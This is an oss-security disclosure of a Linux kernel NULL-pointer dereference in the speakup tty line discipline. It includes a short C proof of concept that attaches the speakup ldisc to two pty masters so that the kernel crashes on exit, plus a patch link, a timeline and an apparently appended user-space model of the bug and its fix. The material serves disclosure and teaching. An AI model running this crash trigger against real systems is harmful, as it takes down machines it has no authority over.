Message-ID: <CAM1BPE6J_heHs_ckMm5u_Pv6Wnssv_3wgiCNBJs+HLQ+4qkC4A@mail.gmail.com>
Date: Thu, 19 Nov 2020 10:46:59 +0800
From: Shisong Qin <qinshisong1205@...il.com>
To: oss-security@...ts.openwall.com
Cc: nopitydays@...il.com
Subject: Linux kernel NULL-ptr deref bug in spk_ttyio_ldisc_close
Hi,
Recently we found a NULL-ptr deref BUG in spk_ttyio.c in the longterm 4.19
Linux kernel, and it could also be triggered in the 5.9 Linux kernel. In
function spk_ttyio_ldisc_close, it frees "speakup_tty->disc_data"
and sets "speakup_tty" to NULL. However, if we open two tty devices, use
tiocsetd() to set both of them as "speakup_tty" and then close them in turn, the first
close sets "speakup_tty" to NULL, and the second close then tries to
dereference "speakup_tty", leading to a NULL-ptr deref crash.
This bug can be reproduced in the longterm 4.19 Linux kernel with
CONFIG_STAGING=y, CONFIG_SPEAKUP=y and CONFIG_KASAN=y.
To reproduce it in the 5.9 Linux kernel, CONFIG_ACCESSIBILITY=y is also
required in the config. Here is a simple poc:
#define _GNU_SOURCE
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>   /* ioctl() prototype; missing from the original listing */
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
int main(void) {
/* 0x1a is the speakup line discipline number (N_SPEAKUP) */
int disc = 0x1a;
/* attach the speakup ldisc to a first pty master (0x5423 == TIOCSETD) */
int fd = open("/dev/ptmx", O_RDWR, 0);
ioctl(fd, 0x5423, &disc);
/* attach it again to a second pty master; speakup_tty now points at fd2's tty */
int fd2 = open("/dev/ptmx", O_RDWR, 0);
ioctl(fd2, 0x5423, &disc);
/* both fds are released on exit; the second ldisc close dereferences NULL */
return 0;
}
After the process returns, the automatic release of both fds triggers
the NULL-ptr deref bug.
Here is the commit to patch this BUG:
https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty.git/commit/?h=tty-linus&id=d4122754442799187d5d537a9c039a49a67e57f1
Timeline:
* 2020/11/10 - Vulnerability reported to security@...nel.org
* 2020/11/11 - Vulnerability confirmed, and reported to linux-distros@...openwall.org.
* 2020/11/19 - Vulnerability opened.
Thanks,
Shisong Qin and Bodong Zhao, Tsinghua University
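The pattern behind this report is a line discipline that keeps its one attached tty in a global pointer and assumes open/close calls come in matched pairs. The user-space model below is an added illustration, not the reporters' PoC and not the kernel's spk_ttyio.c: it replays the same sequence (attach twice, release twice) against a vulnerable model that blindly overwrites the global and dereferences it on release, and against a hardened model that refuses a second attach with -EBUSY and only releases the tty it actually owns. The struct names, the run_sequence driver and the "return -1 instead of oops" convention are assumptions made so the outcome can be checked from user space.

```c
/* Added model of a global-singleton line discipline; not kernel code. */
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

struct tty { int id; void *disc_data; };

/* Stand-in for the global speakup_tty in spk_ttyio.c (assumption: modeled here). */
static struct tty *speakup_tty;

/* Vulnerable model: every attach succeeds and silently overwrites the global. */
static int vuln_open(struct tty *t) {
    t->disc_data = malloc(16);
    speakup_tty = t;
    return 0;
}

/* Vulnerable model of close: dereferences the global without checking it.
 * Returns -1 where the real kernel would oops on the NULL pointer. */
static int vuln_close(struct tty *t) {
    (void)t;
    if (!speakup_tty)
        return -1;                    /* NULL speakup_tty: this is the crash */
    free(speakup_tty->disc_data);
    speakup_tty->disc_data = NULL;
    speakup_tty = NULL;
    return 0;
}

/* Hardened model: the ldisc can be attached to at most one tty at a time. */
static int fixed_open(struct tty *t) {
    if (speakup_tty)
        return -EBUSY;                /* second attach is refused */
    t->disc_data = malloc(16);
    speakup_tty = t;
    return 0;
}

/* Hardened model of close: only tears down state this tty actually owns. */
static int fixed_close(struct tty *t) {
    if (speakup_tty != t)
        return 0;                     /* not ours (or already released): nothing to do */
    free(t->disc_data);
    t->disc_data = NULL;
    speakup_tty = NULL;
    return 0;
}

/* Replay the reported sequence: attach tty a, attach tty b, release a, release b.
 * A release is only issued for a tty whose attach succeeded, mirroring that the
 * kernel does not call ldisc close when ldisc open failed.
 * Returns 1 if any release hit a NULL speakup_tty, 0 otherwise. */
static int run_sequence(int (*attach)(struct tty *), int (*release)(struct tty *)) {
    struct tty a = { 1, NULL }, b = { 2, NULL };
    int a_attached = (attach(&a) == 0);
    int b_attached = (attach(&b) == 0);
    int crashed = 0;

    if (a_attached && release(&a) < 0) crashed = 1;
    if (b_attached && release(&b) < 0) crashed = 1;

    free(a.disc_data);                /* reclaim anything the vulnerable path leaked */
    free(b.disc_data);
    speakup_tty = NULL;               /* reset the global for the next run */
    return crashed;
}

int main(void) {
    printf("vulnerable model crashed: %d\n", run_sequence(vuln_open, vuln_close));
    printf("hardened model crashed:   %d\n", run_sequence(fixed_open, fixed_close));
    return 0;
}
```

In the vulnerable run the first release frees the second tty's disc_data (because the global was overwritten) and clears the global, so the second release finds NULL. Refusing the second attach keeps the global and the attached tty in one-to-one correspondence, which is the invariant the close path relies on.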